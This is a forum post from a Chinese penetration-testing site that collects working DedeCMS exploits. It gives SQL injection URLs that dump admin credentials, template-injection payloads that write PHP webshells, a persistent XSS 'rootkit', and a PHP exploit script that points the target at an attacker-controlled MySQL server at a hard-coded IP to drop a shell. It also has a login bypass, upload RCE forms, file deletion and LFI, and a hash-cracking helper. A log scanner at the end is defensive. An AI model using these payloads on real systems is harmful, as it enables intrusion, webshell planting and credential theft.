China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: DedeCMS vulnerability roundup

Author: admin    Posted: 2012-10-18 10:42

Dedecms 5.6 rss.php SQL injection
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
Error-based injection through the keys of the _Cs[] array parameter: updatexml() raises an XML error whose message carries the admin username and MID(pwd,4,16), which is the 16-character MD5 form of the stored 20-character hash (see the note on the hash format under the advancedsearch.php entry below).

DedeCms v5.6 embedded malicious code execution
Register a member account and upload a "software" item; in the local address field enter
a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the injected PHP.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant creates x.php with password xiao, i.e. it drops a one-line shell directly: the two base64 strings decode to the filename x.php and to <?php eval($_POST[xiao])?>baidu.

Dede 5.6 GBK SQL injection (wide-byte injection in member/index.php)
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
The multi-byte characters placed in front of the quote are there so that, on a GBK database connection, their trailing byte pairs with the escaping backslash added before the quote, leaving the quote itself unescaped; the last two URLs are bare probes to confirm the behaviour before injecting.

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL execution
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The sql parameter is executed as supplied; #@__ (URL-encoded here as %23@__) is the placeholder DedeCMS expands to the configured table prefix, so the query reads the admin table whatever prefix the site uses.

DEDECMS all versions: gotopage parameter XSS
1. Copy the URL below into the browser to trigger the XSS and install the XSS "rootkit". Note that IE8/9 block URL-borne XSS; their XSS filter has to be disabled.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. Whichever of the URLs below is visited afterwards, the XSS fires again: the String.fromCharCode payload decodes to JavaScript that shows alert(/xss rootkit!/), stores the injected "><script>...</script><x=" markup in a cookie named gotopage with a 365-day expiry and then reports "Xss Rootkit Install Successful", so login.php keeps reflecting the cookie value on every later visit whether or not the parameter is present.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell
The script below POSTs to plus/mytag_js.php with _COOKIE[GLOBALS][cfg_db*] parameters that overwrite the database settings, so the target reads its dede_mytag table from the attacker's MySQL server (hard-coded in the script as 184.105.174.114 / exploit / 90sec); the row served from there carries a {dede:php} block that writes the shell (compare the "tag remote file write" entry below). The script only inspects the HTTP status line, so "Exploit Success" means the request was accepted, not that the shell file was verified to exist.

#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if(!isset($argv[3])){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache   aid=2 shellpath= /   aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];   // target host name, without scheme
$aid=$argv[2];   // id of the row in the attacker's dede_mytag table; decides where the shell lands
$path=$argv[3];  // directory DedeCMS is installed in on the target
$exp=Getshell($url,$aid,$path);
// $exp is only the status line, e.g. "HTTP/1.1 200 OK", where "OK" sits at offset 13.
if (strpos($exp,"OK")>12){
    echo "Exploit Success \n";
    if($aid==1) echo "Shell:".$url."/$path/data/cache/fuck.php\n";
    if($aid==2) echo "Shell:".$url."/$path/fuck.php\n";
    if($aid==3) echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "Exploit Failed \n";
}

function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    // The _COOKIE[GLOBALS][cfg_db*] fields overwrite the DB configuration with the attacker's server;
    // QuickSearchBtn is the GBK-encoded "提交" submit button from the HTML form variant.
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "No response from ".$host."\n";
        return '';
    }
    fwrite($ock,$data);
    // Read and return only the first line of the response (the status line).
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;
    }
    return '';
}
?>

DedeCms v5.6-5.7 unauthorized access (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Replace validate=dcug with the captcha currently displayed and the request logs you straight into the backend ("织梦网站后台" in the URL stands for the admin directory, dede/ by default). It is the same _POST[GLOBALS][cfg_db*] overwrite as the getshell above, applied to login.php: the credentials admin / inimda are checked against the attacker's own database at 116.255.183.90 instead of the target's.

Prerequisite: the backend path has to be known.

Dedecms (织梦) tag remote file write
Prerequisite: prepare your own dede database and insert the row
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
(the string passed to fwrite is left empty on the page; the {dede:php} body is what the target executes when it renders the tag).

Then submit the form below and the shell appears as 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at the URL typed into the doaction field before it is submitted.
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution
1. Register a user, enter the member backend, publish an article and upload an image. Then, in attachment management, replace the image with a crafted template; say the image name is:
uploads/userup/2/12OMX04-15A.jpg

Template content (prefix it with gif89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source and build a form like this one (the templet and dede_addonfields inputs are the crafted part; idhash and sortrank are copied from the real edit form):
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>

<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)

<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)

<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(short description of the content)

<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<!-- crafted fields: point templet at the uploaded "image" and make article_edit.php save templet as an add-on field -->
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">
</div>

<!-- form action area -->
<h3 class="meTitle">Body</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value='<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>' style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to refresh" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>

</div>

</form>

Submit; if the edit is reported as successful, the template path has been changed.
3. Visit the edited article. Assuming its aid is 2, requesting
http://127.0.0.1/dede/plus/view.php?aid=2
renders the crafted template and writes the webshell 1.php into the plus directory.

DEDECMS content management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif (the Gif89a prefix satisfies the image-format check; runphp='yes' makes the template engine execute the tag body as PHP).
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">Change</button>
</form>

Build the form above; after upload the image is stored as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<!-- crafted fields: the article's template is redirected to the uploaded "image" -->
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>

Dedecms (织梦) V5.6 remote file deletion
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
Path traversal in the oldface parameter of the avatar editor: the "old avatar" to delete is taken straight from the request, so any file the web server process is allowed to delete can be removed.

Dedecms (织梦) V5.6 plus/carbuyaction.php local file inclusion
http://www.test.com/plus/carbuya ... urn&code=../../
(the URL is truncated on the original page; the traversal sequence goes into the code parameter)

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL execution (same issue as above; on the admin row it returns)
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The pwd column is not a plain MD5: it is the 32-character MD5 with the first 5 and last 7 characters removed, a 20-character string. To get the common 16-character MD5 from it, drop a further 3 characters from the front and 1 from the end (the rss.php payload above does the same with MID(pwd,4,16)). Cracking tools therefore need the 16-character form, or the candidate's MD5 trimmed the same way.
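A helper for the hash format just described, added here as an example and not code from the original post or from DedeCMS itself: it derives the 20-character admin hash from a password, converts a 20-character hash to the 16-character MD5 (the same slice the rss.php payload above takes with MID(pwd,4,16)), and checks candidate passwords against whichever form a dump contains. The password list in the usage block is constructed; md5("admin") = 21232f297a57a5a743894a0e4a801fc3 is used as the known reference value.

```python
import hashlib
import hmac
from typing import Iterable, Optional


def _md5_hex(password: str) -> str:
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def dede_admin_hash(password: str) -> str:
    """DedeCMS admin hash: the 32-char MD5 with the first 5 and last 7 chars removed (20 chars)."""
    return _md5_hex(password)[5:25]


def to_md5_16(hash20: str) -> str:
    """20-char DedeCMS hash -> 16-char MD5: drop 3 chars from the front and 1 from the end.

    This equals characters 8..23 of the full digest, i.e. MySQL MID(pwd,4,16) on the stored value.
    """
    if len(hash20) != 20:
        raise ValueError("expected a 20-character DedeCMS hash")
    return hash20[3:19]


def md5_16(password: str) -> str:
    """Classic 16-char MD5 computed directly from the password (characters 8..23 of the digest)."""
    return _md5_hex(password)[8:24]


def verify_password(password: str, stored: str) -> bool:
    """Check a candidate against a hash in any of the three forms found in DedeCMS dumps."""
    stored = stored.strip().lower()
    full = _md5_hex(password)
    if len(stored) == 32:      # full MD5 (member table style)
        candidate = full
    elif len(stored) == 20:    # admin table style
        candidate = full[5:25]
    elif len(stored) == 16:    # 16-char MD5, e.g. what the rss.php payload leaks
        candidate = full[8:24]
    else:
        return False
    return hmac.compare_digest(candidate, stored)


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first wordlist entry that matches the stored hash, or None."""
    for word in wordlist:
        if verify_password(word, stored):
            return word
    return None


if __name__ == "__main__":
    # Constructed example: the well-known default admin/admin hash.
    leaked = dede_admin_hash("admin")
    print("20-char:", leaked, "16-char:", to_md5_16(leaked))
    print("match:", crack(leaked, ["123456", "password", "admin"]))
```

to_md5_16 and md5_16 agree on every password, which is the property the "drop 3 and 1" rule relies on; verify_password picks the slice from the length of the stored value so a dump mixing admin (20) and member (32 or 16) hashes can be checked with one routine.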

Dedecms (织梦) 5.1 feedback_js.php injection
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
The payload shape is a second-order injection: the outer UNION makes the first query return the double-quoted string as a result column, and that string is then used unescaped in the second query against dede_feedback, which is where userid and pwd from dede_admin are pulled into the output.

Dedecms (织梦) select_soft_post.php uninitialised variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<!-- with register_globals on, these POST fields initialise the cfg_* settings the upload handler never sets itself -->
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>

Dedecms (织梦) 5.3 - 5.5 plus/digg_frame.php injection
Uses a MySQL numeric-overflow error together with the fact that DedeCMS records database errors in a PHP file (data/mysql_error_trace.php) whose header is not validated, so attacker-controlled text from the failing request ends up inside that file.
1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
(the URL is truncated on the original page; %65 is "e", producing the out-of-range double 1024e1024). An error message is displayed.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and the following output shows the injection worked:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
(int(3) is the injected var_dump(3) executing, so the eval($_POST[x]) in front of it runs as well)

3. Run test.html from dede.rar (not reproduced on the page); the form's action is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking OK, seeing the step-2 output again means the trojan upload succeeded.

Dedecms (织梦) plus/infosearch.php injection
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
The %cf lead byte is the wide-byte trick again: under a GBK connection it pairs with the backslash that escapes the following quote, so the UNION runs.
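As an added example that is not part of the original post, the request shapes collected above turned into a small access-log scanner in Python. The log lines are constructed here and mirror this page's URLs; the signature names, the LOG_RE format and the double URL-decoding are choices made for the example. Body-borne attacks (the mytag_js.php POST, the select_soft_post.php upload) leave only the path in an access log, and the cookie-replayed gotopage XSS leaves nothing at all, so those need request-body logging or a WAF rule rather than a scanner like this.

```python
import re
from urllib.parse import unquote

# Combined/common log format: client, ident, user, [time], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each signature mirrors one request shape documented on this page.
SIGNATURES = (
    # _COOKIE[GLOBALS][cfg_dbhost]=... / _POST[GLOBALS][cfg_dbhost]=... (mytag_js.php, login.php)
    ("var-overwrite", re.compile(r"_(?:COOKIE|POST|GET|SESSION)\[GLOBALS\]|[?&]cfg_\w+=", re.I)),
    # login.php?gotopage="><script>... (the cookie replay is invisible in an access log)
    ("gotopage-xss", re.compile(r"[?&]gotopage=[^&]*[<\"']", re.I)),
    # plus/advancedsearch.php?mid=1&sql=SELECT ...
    ("advancedsearch-sql", re.compile(r"/advancedsearch\.php\?.*[?&]sql=", re.I)),
    # member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../..
    ("edit_face-delete", re.compile(r"/edit_face\.php\?.*dopost=delold.*oldface=[^&]*\.\./", re.I)),
    # plus/carbuyaction.php?...&code=../../
    ("carbuyaction-lfi", re.compile(r"/carbuyaction\.php\?.*[?&]code=[^&]*\.\./", re.I)),
    # rss.php / feedback_js.php / infosearch.php payloads
    ("sqli", re.compile(r"\bunion\s+(?:all\s+)?select\b|\bupdatexml\s*\(", re.I)),
    # digg_frame.php: PHP smuggled into the SQL error log
    ("php-in-param", re.compile(r"\?>|\beval\s*\(\s*\$_(?:POST|GET|REQUEST)", re.I)),
)


def classify(target: str) -> list:
    """Return the names of every signature matching the (decoded) request target."""
    decoded = unquote(unquote(target))  # two passes so %25xx double-encoding is seen too
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan_log(lines) -> list:
    """Return (client ip, raw target, [signature names]) for every matching request line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        names = classify(m["target"])
        if names:
            hits.append((m["ip"], m["target"], names))
    return hits


# Constructed sample lines (not real traffic); the targets mirror the URLs on this page.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Oct/2012:10:42:00 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2012:10:42:03 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx=%22 HTTP/1.1" 200 3201 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2012:10:42:07 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST%5BGLOBALS%5D%5Bcfg_dbhost%5D=116.255.183.90&_POST%5BGLOBALS%5D%5Bcfg_dbuser%5D=root HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2012:10:42:11 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2012:10:42:15 +0800] "GET /plus/infosearch.php?action=search&q=%cf%27%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2012:10:42:19 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23%27][0]=1 HTTP/1.1" 200 910 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [18/Oct/2012:10:43:00 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [18/Oct/2012:10:43:04 +0800] "GET /dede/login.php?gotopage=dasdasdasda HTTP/1.1" 200 3201 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target, names in scan_log(SAMPLE_LOG):
        print(ip, ",".join(names), target)
```

The two clean lines at the end are deliberate: /plus/view.php?aid=2 is exactly what triggers the template-execution shell drop and gotopage=dasdasdasda is the cookie-replay request, and neither is distinguishable from normal traffic by URL alone. Pair the scanner with the hash check and a file-integrity watch on plus/, data/cache/ and the install root, where the entries above place their shells.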





Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2